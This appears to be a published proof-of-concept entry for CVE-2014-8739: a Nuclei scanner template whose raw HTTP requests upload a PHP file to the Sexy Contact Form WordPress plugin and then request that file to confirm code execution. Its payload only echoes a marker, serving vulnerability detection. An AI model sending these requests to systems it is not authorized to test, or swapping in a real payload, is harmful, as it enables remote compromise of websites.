Unrestricted file upload vulnerability in server/php/UploadHandler.php in the jQuery File Upload Plugin 6.4.4 for jQuery, as used in the Creative Solutions Creative Contact Form (formerly Sexy Contact Form) before 1.0.0 for WordPress and before 2.0.1 for Joomla!, allows remote attackers to execute arbitrary code by uploading a PHP file with an PHP extension, then accessing it via a direct request to the file in files/, as exploited in the wild in October 2014.
PoC代码[已公开]
id: CVE-2014-8739
info:
name: WordPress Sexy Contact Form (<= 0.9.7) - Arbitrary File Upload
author: melmathari
severity: critical
description: |
Unrestricted file upload vulnerability in server/php/UploadHandler.php in the jQuery File Upload Plugin 6.4.4 for jQuery, as used in the Creative Solutions Creative Contact Form (formerly Sexy Contact Form) before 1.0.0 for WordPress and before 2.0.1 for Joomla!, allows remote attackers to execute arbitrary code by uploading a PHP file with an PHP extension, then accessing it via a direct request to the file in files/, as exploited in the wild in October 2014.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-8739
- https://www.exploit-db.com/exploits/35057
- https://www.exploit-db.com/exploits/36811
- http://www.openwall.com/lists/oss-security/2014/11/11/4
- http://www.openwall.com/lists/oss-security/2014/11/11/5
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2014-8739
cwe-id: CWE-434
epss-score: 0.83444
epss-percentile: 0.99235
cpe: cpe:2.3:a:creative-solutions:creative_contact_form:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: creative-solutions
product: creative_contact_form
framework: wordpress
publicwww-query: "/wp-content/plugins/sexy-contact-form/"
tags: cve,cve2014,wordpress,wp-plugin,wp,sexy-contact-form,intrusive,file-upload,rce
flow: http(1) && http(2)
variables:
marker: "{{randstr}}"
fname: "{{rand_base(6)}}"
http:
- raw:
- |
POST /wp-content/plugins/sexy-contact-form/includes/fileupload/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="files[]"; filename="{{fname}}.php"
Content-Type: application/octet-stream
<?php echo "{{marker}}"; ?>
------WebKitFormBoundary7MA4YWxkTrZu0gW--
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "files","delete_url")'
- 'contains(content_type, "text/plain")'
condition: and
internal: true
- raw:
- |
GET /wp-content/plugins/sexy-contact-form/includes/fileupload/files/{{fname}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
words:
- "{{marker}}"
# digest: 4b0a004830460221008e1ed7371d6aa38df7c21390fbfc1fe5e5dd7416dd6f2888d9d625a43369dcfe022100d70b65d92a0083d6412f5ecd11f8c43734c797db3dfd9a27cabb6f3eef904839:922c64590222798bb761d5b6d8e72950